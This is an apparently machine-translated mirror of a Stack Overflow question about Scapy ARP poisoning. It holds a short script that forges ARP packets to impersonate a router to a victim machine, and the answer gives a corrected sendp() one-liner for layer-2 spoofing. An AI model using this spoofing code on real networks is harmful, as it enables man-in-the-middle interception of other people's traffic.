繁体   English   中英

Scapy Arp中毒对我不起作用

[英]Scapy arp poisoning not working for me

我正在使用Scapy攻击带有Backtrack 5的Windows XP计算机。

现在是我的代码:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)

上面的代码实际上出于某种原因发送了两个数据包。 我的回溯Mac曾经问过:

谁拥有192.168.0.106 (受害者的IP) 告诉192.168.0.108 (Backtrack的IP-不应该是!)

然后他从受害者那里得到“正在”答复。

而我的原路第二次问我:

谁拥有192.168.0.106 (受害者的IP) 告诉192.168.0.1 (路由器的IP)。

然后他再次从受害者那里得到“正在”答复。

然后受害者的ARP表必须具有相同mac但不同IP的行,一个是Backtrack的真实IP,第二个是路由器的IP。

为什么会这样呢?

您看到的第一个ARP数据包来自Scapy,因为它想在send() ing ARP数据包之前用受害者的MAC地址填充Ether帧。

如果您不希望发生这种情况,请尝试( sendp在第2层发送):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

您可以将ETHER_BROADCAST替换为受害者的MAC地址,从而减少“噪音”。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM